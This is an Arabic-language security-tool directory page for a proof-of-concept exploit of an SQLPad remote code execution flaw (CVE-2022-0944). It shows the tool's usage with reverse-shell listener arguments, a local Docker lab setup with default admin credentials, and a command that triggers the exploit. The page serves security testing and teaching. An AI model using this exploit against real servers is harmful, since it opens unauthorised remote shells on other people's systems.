Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
أدوات/GitHubGitHub/shhrew/cve-2022-0944
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالتعلم والتعليم
GitHubshhrew/cve-2022-0944

CVE-2022-0944

استغلال لإثبات المفهوم لـ SQLPad RCE (CVE-2022-0944).

عرض المستودع
71منذ 2 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2022-0944

استغلال لإثبات المفهوم لثغرة SQLPad RCE (CVE-2022-0944)

الاستخدام

root@kitploit:~
usage: main.py [-h] url lhost lport [username] [password]

positional arguments:
  url         URL to SQLPad
  lhost       Listener host address for reverse shell
  lport       Listener port for reverse shell
  username    login username (optional)
  password    login password (optional)

options:
  -h, --help  show this help message and exit

مثال:

root@kitploit:~
# install requirements
pip install -r requirements.txt

# start sqlpad docker container
docker run -p 3000:3000 --name sqlpad -d --env SQLPAD_ADMIN=admin --env SQLPAD_ADMIN_PASSWORD=admin sqlpad/sqlpad:6.10.0

# trigger exploit
./main.py http://localhost:3000 127.0.0.1 1337 admin admin

إخلاء المسؤولية

يحتوي هذا المستودع على أكواد وأدوات مخصّصة للأغراض التعليمية فقط، وتحديدًا للاستخدام في دورات الأمن السيبراني وبيئات التعلّم. لا يتحمّل مؤلف هذا الكود أي مسؤولية عن أي عواقب تنجم عن استخدام هذا الكود أو إساءة استخدامه أو تعديله. يُقدَّم الكود «كما هو» دون أي ضمان، صريحًا كان أو ضمنيًا، بما في ذلك على سبيل المثال لا الحصر الضمانات الضمنية المتعلقة بقابلية التسويق أو الملاءمة لغرض معيّن.

تنزيل الأداة